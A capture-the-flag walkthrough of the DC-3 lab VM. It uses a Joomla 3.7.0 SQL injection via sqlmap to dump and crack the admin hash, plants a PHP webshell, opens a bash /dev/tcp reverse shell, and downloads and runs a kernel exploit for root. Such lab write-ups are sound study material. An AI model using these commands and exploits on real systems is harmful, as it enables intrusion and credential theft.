DC-3

Information gathering

Host discovery with nmap finds the target at 192.168.33.138.

Port scan:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-18 08:39 EDT
Nmap scan report for 192.168.33.138
Host is up (0.00100s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:4E:BC:23 (VMware)


Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds

Scan again with service and OS detection:

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 1194D7D32448E1F90741A97B42AF91FA
|_http-generator: Joomla! - Open Source Content Management
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
MAC Address: 00:0C:29:4E:BC:23 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.007 days (since Sun Apr 18 08:30:26 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros

Open it in a browser. The home page reads:

Welcome to DC-3.
This time, there is only one flag, one entry point and no clues.

To get the flag, you'll obviously have to gain root privileges.

How you get to be root is up to you - and, obviously, the system.

Good luck - and I hope you enjoy this little challenge.  :-)

So: a single flag, and root is required to read it.

Run dirsearch:

python3 dirsearch.py -u 192.168.33.138 -x 301,403
[08:45:29] Starting: 
[08:45:32] 200 -   18KB - /LICENSE.txt                                                                                                  
[08:45:32] 200 -    4KB - /README.txt                                   
[08:45:35] 200 -   31B  - /administrator/cache/                                                             
[08:45:35] 200 -    2KB - /administrator/includes/ 
[08:45:35] 200 -    5KB - /administrator/          
[08:45:35] 200 -    5KB - /administrator/index.php
[08:45:35] 200 -   31B  - /administrator/logs/     
[08:45:36] 200 -   31B  - /bin/                                                                                   
[08:45:36] 200 -   31B  - /cache/                                                                   
[08:45:37] 200 -   31B  - /cli/                                                
[08:45:37] 200 -   31B  - /components/                                         
[08:45:37] 200 -    0B  - /configuration.php                  
[08:45:39] 200 -    3KB - /htaccess.txt                                                               
[08:45:39] 200 -   31B  - /images/                                 
[08:45:39] 200 -   31B  - /includes/              
[08:45:39] 200 -    7KB - /index.php                                                                           
[08:45:40] 200 -   31B  - /layouts/                                                                     
[08:45:40] 200 -   31B  - /libraries/                                                                 
[08:45:40] 200 -   31B  - /media/                         
[08:45:40] 200 -   31B  - /modules/                    
[08:45:42] 200 -   31B  - /plugins/                                                     
[08:45:42] 200 -  836B  - /robots.txt.dist                                                      
[08:45:44] 200 -   31B  - /templates/                                                                             
[08:45:44] 200 -   31B  - /templates/index.html    
[08:45:44] 200 -    0B  - /templates/protostar/              
[08:45:44] 200 -    0B  - /templates/system/       
[08:45:44] 200 -    0B  - /templates/beez3/    
[08:45:44] 200 -   31B  - /tmp/                                             
[08:45:45] 200 -    2KB - /web.config.txt

Since we now know the CMS is Joomla, run joomscan, which also reports the version:

joomscan -u 192.168.33.138
[+] FireWall Detector
[++] Firewall not detected


[+] Detecting Joomla Version
[++] Joomla 3.7.0


[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable


[+] Checking Directory Listing
[++] directory has directory listing : 
http://192.168.33.138/administrator/components
http://192.168.33.138/administrator/modules
http://192.168.33.138/administrator/templates
http://192.168.33.138/images/banners




[+] Checking apache info/status files
[++] Readable info/status files are not found


[+] admin finder
[++] Admin page : http://192.168.33.138/administrator/                                                                                                       


[+] Checking robots.txt existing                                                                                                                             
[++] robots.txt is not found                                                                                                                                 


[+] Finding common backup files name                                                                                                                         
[++] Backup files are not found                                                                                                                              


[+] Finding common log files name                                                                                                                            
[++] error log is not found                                                                                                                                  


[+] Checking sensitive config.php.x file                                                                                                                     
[++] Readable config files are not found
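Joomscan reads the version out of the manifest Joomla 3.x ships at administrator/manifests/files/joomla.xml. The same check by hand, as an added Python example that is not part of the original writeup: it parses that manifest and says whether the version is the one CVE-2017-8917 affects, so the version is confirmed before sqlmap is pointed at the box. The target URL is the one from the scan; the sample manifest below is constructed, trimmed to the elements that matter.

```python
import re
import sys
import urllib.request
import xml.etree.ElementTree as ET

# Joomla 3.x ships its core version in this world-readable manifest on a default install.
MANIFEST_PATH = "/administrator/manifests/files/joomla.xml"

# CVE-2017-8917 (com_fields ORDER BY injection) affects exactly 3.7.0; 3.7.1 fixed it.
VULN_VERSION = (3, 7, 0)


def parse_version(manifest_xml: str) -> tuple:
    """Return the <version> of a Joomla file manifest as an int tuple, e.g. (3, 7, 0)."""
    root = ET.fromstring(manifest_xml.encode("utf-8"))
    node = root.find("version")
    if node is None or not node.text:
        raise ValueError("manifest has no <version> element")
    digits = re.findall(r"\d+", node.text)
    if not digits:
        raise ValueError("unparseable version: %r" % node.text)
    return tuple(int(d) for d in digits[:3])


def is_cve_2017_8917_candidate(version: tuple) -> bool:
    """Only 3.7.0 carries the com_fields bug; anything else needs a different route in."""
    return tuple(version) == VULN_VERSION


def fetch_manifest(base_url: str) -> str:
    """Pull the manifest from a live target (not exercised offline)."""
    url = base_url.rstrip("/") + MANIFEST_PATH
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed sample, shaped like the real joomla.xml but cut down to the relevant elements.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<extension version="3.6" type="file" method="upgrade">
    <name>files_joomla</name>
    <author>Joomla! Project</author>
    <version>3.7.0</version>
    <description>FILES_JOOMLA_XML_DESCRIPTION</description>
</extension>
"""

if __name__ == "__main__":
    # Usage: python3 joomla_version.py http://192.168.33.138   (no argument = offline sample)
    text = fetch_manifest(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_MANIFEST
    version = parse_version(text)
    verdict = "CVE-2017-8917 candidate" if is_cve_2017_8917_candidate(version) else "not 3.7.0"
    print("Joomla %s: %s" % (".".join(map(str, version)), verdict))
```

If the manifest is blocked or missing, the version from joomscan or the README.txt that dirsearch found is the fallback; the manifest is simply the most precise source.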

Finding the admin password via SQL injection

The target runs Joomla 3.7.0, so search for known exploits:

searchsploit joomla | grep "3\.7"
Joomla! 3.7 - SQL Injection                                                    | php/remote/44227.php
Joomla! 3.7.0 - 'com_fields' SQL Injection                                     | php/webapps/42033.txt

I tried the first one and it didn't seem to work, so open the second:

# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Parameter: list[fullordering] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

Run sqlmap against the target with the same request. The injection sits in the ORDER BY clause that list[fullordering] feeds, which is why -p pins sqlmap to that one parameter instead of letting it probe the others:

sqlmap -u "http://192.168.33.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Output:

[09:26:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[09:26:43] [INFO] fetching database names
[09:26:43] [INFO] retrieved: 'information_schema'
[09:26:43] [INFO] retrieved: 'joomladb'
[09:26:43] [INFO] retrieved: 'mysql'
[09:26:43] [INFO] retrieved: 'performance_schema'
[09:26:43] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys


[09:26:43] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2671 times
[09:26:43] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.33.138'

The 2671 HTTP 500s are the error-based technique at work: every probe makes MySQL throw an error that Joomla renders as a 500 page, so this is loud in any web server log. Next, list the tables in joomladb:

sqlmap -u "http://192.168.33.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables  -p list[fullordering]
[76 tables]
+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks    |
| #__banners          |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments    |
| #__bsms_locations   |
| #__bsms_mediafiles  |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series      |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers    |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics      |
| #__bsms_update      |
| #__categories       |
| #__contact_details  |
| #__content_frontpag |
| #__content_rating   |
| #__content_types    |
| #__content          |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups    |
| #__fields_values    |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy  |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens    |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages        |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules          |
| #__newsfeeds        |
| #__overrider        |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas          |
| #__session          |
| #__tags             |
| #__template_styles  |
| #__ucm_base         |
| #__ucm_content      |
| #__ucm_history      |
| #__update_sites_ext |
| #__update_sites     |
| #__updates          |
| #__user_keys        |
| #__user_notes       |
| #__user_profiles    |
| #__user_usergroup_m |
| #__usergroups       |
| #__users            |
| #__utf8_conversion  |
| #__viewlevels       |
+---------------------+

The #__ prefix is Joomla's table-prefix placeholder: the injection lands inside Joomla's own query, and Joomla substitutes the real prefix before the query reaches MySQL, so payloads can name #__users directly without knowing the prefix. Dump the columns of #__users:

sqlmap -u "http://192.168.33.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns  -p list[fullordering]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | non-numeric |
| id       | numeric     |
| name     | non-numeric |
| params   | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

Dump the username and password columns:

sqlmap -u "http://192.168.33.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C 'username,password' --dump  -p list[fullordering]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+

Cracking the hash

The $2y$10$ prefix marks a bcrypt hash at cost 10, which john recognises on its own (its bcrypt format). Save the hash to a file and run john:

john dc3.txt        // dc3.txt holds the hash dumped above

That yields the password snoopy, and the login to the administrator backend succeeds. bcrypt at cost 10 is deliberately slow to brute-force, so this only finishes quickly because the password is weak.

Planting a one-line webshell from the admin panel

dirsearch had already found the templates directory, and the admin panel's template editor lets you edit template source files, so the first idea was to add a one-line PHP eval webshell to the template's index.php.

That one could not be connected to, so instead a new file test.php containing the one-liner was created in the same directory, and the connection succeeded.

Reverse shell back to Kali

nc -lvp 2233                                                // on Kali
bash -c 'bash -i >& /dev/tcp/192.168.33.128/2233 0>&1'     // run through the AntSword (蚁剑) connection; 192.168.33.128 is the Kali IP

For how a bash reverse shell works, see [1] and https://blog.csdn.net/revilwang/article/details/8374362.

Why must it be bash -c? The webshell hands the command to PHP, which executes it through /bin/sh, and on Ubuntu /bin/sh is dash. Both halves of the one-liner are bash extensions: the /dev/tcp/host/port pseudo-device is opened by bash itself and does not exist as a file, and the >& redirection form is bash syntax that dash rejects. Wrapping the whole command in bash -c '...' makes bash, not dash, parse and run it.

Kernel privilege escalation

Next, privilege escalation. Local enumeration turned up nothing: no user able to run sudo, no SUID binaries or files worth abusing, no cron jobs, no misconfigured sensitive files. That leaves a kernel exploit as the last resort.

Check the distribution and kernel version:

lsb_release -a:
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:        16.04
Codename:       xenial
uname -a:
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux

Search for Ubuntu 16.04 privilege-escalation exploits:

searchsploit Ubuntu 16.04

After some digging, 39772.txt (CVE-2016-4557, the eBPF double-fdput bug in Linux 4.4) turned out to be usable. Its usage notes:

An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7

Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

Download it on the Kali attack box first:

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

Then serve it from a web server on Kali (the archive is served as dc3.zip below). If you would rather not use port 80, this works too:

python -m SimpleHTTPServer 9999

Then fetch it from the interactive shell on the target (add the port to the URL if you used the 9999 listener):

wget http://192.168.33.128/dc3.zip

The first attempt failed. I initially suspected the server side, but the real cause was that the current directory was not writable by the user the webshell runs as.

Switching to a writable directory (/tmp is the usual choice) made the download succeed.

Unzip it (39772.zip contains exploit.tar, which has to be unpacked as well), then run the two scripts in order as the notes describe. compile.sh invokes gcc on the target, so a compiler has to be present there (it is on DC-3), and since the exploit races a kernel bug it can take up to a minute to hand over the shell:

./compile.sh
./doubleput

That drops a root shell, and the flag can be read from there.

References

[1] https://blog.csdn.net/Auuuuuuuu/article/details/89059176 (how bash reverse shells work)